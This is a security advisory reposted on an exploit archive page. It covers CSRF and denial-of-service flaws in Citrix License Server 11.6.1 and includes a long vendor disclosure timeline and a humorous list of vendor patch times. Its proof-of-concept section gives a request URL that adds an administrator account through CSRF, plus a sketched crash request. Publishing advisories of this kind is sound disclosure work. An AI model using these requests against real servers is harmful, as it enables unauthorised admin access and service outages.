what you don't know can hurt you

Citrix License Server 11.6.1 Build 10007 CSRF

Citrix License Server 11.6.1 Build 10007 CSRF
Posted Mar 16, 2012
Authored by Knud, Rune | Site nsense.fi

Citrix License Server version 11.6.1 build 10007 suffers from cross site request forgery and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, csrf
MD5 | 85f97d5071c893da44c89433201ae0d8

Citrix License Server 11.6.1 Build 10007 CSRF

Change Mirror Download
      nSense Vulnerability Research Security Advisory NSENSE-2012-001
---------------------------------------------------------------

Affected Vendor: Citrix
Affected Product: Citrix License Server 11.6.1 build 10007
Impact: DoS, CSRF
Vendor response: New version released
CVE: N/A
Credit: Rune & Knud aka Smurfbuddies / nSense
Release date: 15 Mar 2012
Vendor link: http://support.citrix.com/article/CTX128167

Technical details
---------------------------------------------------------------

The license server web management interface contains two
vulnerabilities:
1) Denial-of-Service vulnerability which allows an
unauthenticated attacker to crash the license server.

2) Cross Site Request Forgery vulnerability which enables an
attacker to create additional users in the management
interface, IF a logged-in administrator can be lured to
visit a link pointing to the vulnerable functionality.

Timeline:
2010-12-20 Sent an e-mail to secure@citrix.com with
vulnerability details
2010-12-20 Citrix acknowledged the submission and opened a case
2011-01-31 Requested a status update
2011-01-31 Citrix replied, stated vulnerabilities are in a
third party component
2011-01-31 Requested more detailed information about the patch
schedule
2011-02-14 Requested a status update
2011-02-14 Citrix replied
2011-02-16 Requested more detailed information to justify
deadline extension
2011-02-17 Citrix replied
2011-02-17 Requested information about the bulletin
2011-02-17 Citrix replied
2011-02-23 Citrix delivered bulletin information
2011-02-23 Requested information regarding the bulletin
2011-02-23 Citrix replied
2011-02-24 Supplied Citrix information about nSense disclosure
policy
2011-03-20 Requested information about the patch schedule
2011-03-29 Requested a status update
2011-03-30 Enquired whether e-mails had been received
2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from
support@citrix.com
2011-03-31 Citrix replied
2011-03-31 Acknowledged continuing coordination
2011-04-19 Requested a status update
2011-05-25 Requested a status update
2011-06-15 Requested a status update
2011-06-16 Citrix replied
2011-07-17 Requested a status update
2011-08-17 Requested a status update
2011-08-17 Citrix replied
2011-10-12 Requested a status update
2011-10-21 Requested a status update
2011-10-21 Citrix replied. Still validating patches,
still no release date set
2011-11-18 Requested a status update. Sent timeline to
Citrix
2011-12-05 Citrix replied. Targeting February 2012.
Citrix promised to send new information if
the planned schedule changes
2012-02-29 February 2012 officially over. No news
from Citrix
2012-03-02 Citrix informed they are preparing a release
2012-03-05 Replied and specified credit information
2012-03-13 Citrix replied. Sent knowledge base link
2012-03-15 Advisory released. Old nSense vulnerability
coordination policy officially terminated.

Proof-of-Concept:
http://citrix-license-server-ip:8082/users?licenseTab=&selected
=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&con
firm=xsrf&accountType=admin&originalAccountType=&Create=Save
(Administrator CSRF)

http://citrix-license-server-ip:8082/dashboard?
<something long here>=2 (pre auth DoS, crashes lmadmin.exe)

Note! The lmadmin crash was _not_ analyzed in any way.

Additional information
----------------------
As our current vulnerability coordination policy has come to
an end, we wanted to share with you some of the lap times from
vendors who have gone through our test track.

Vendor with a reasonably-priced vulnerability

Leaderboard
-----------
VeryPDF: 1 week
Nullsoft: 2 weeks
Adobe: 2 months
Cisco: 2.5 months
SAP: 2.5 months
Adobe: 3 months
Teamspeak: 3 months / no patch (CERT-FI)
Azeotech: 3.5 months (ICS-CERT)
Angelina Jolie*: 5 months (ICS-CERT)
Apple: 6 months
Novell: 8 months
Citrix: 15 months
* Bill Bailey, or was it Scadatec?

And on this bombshell, it is time to end. Good night!
---------------------------------------------------------------
http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close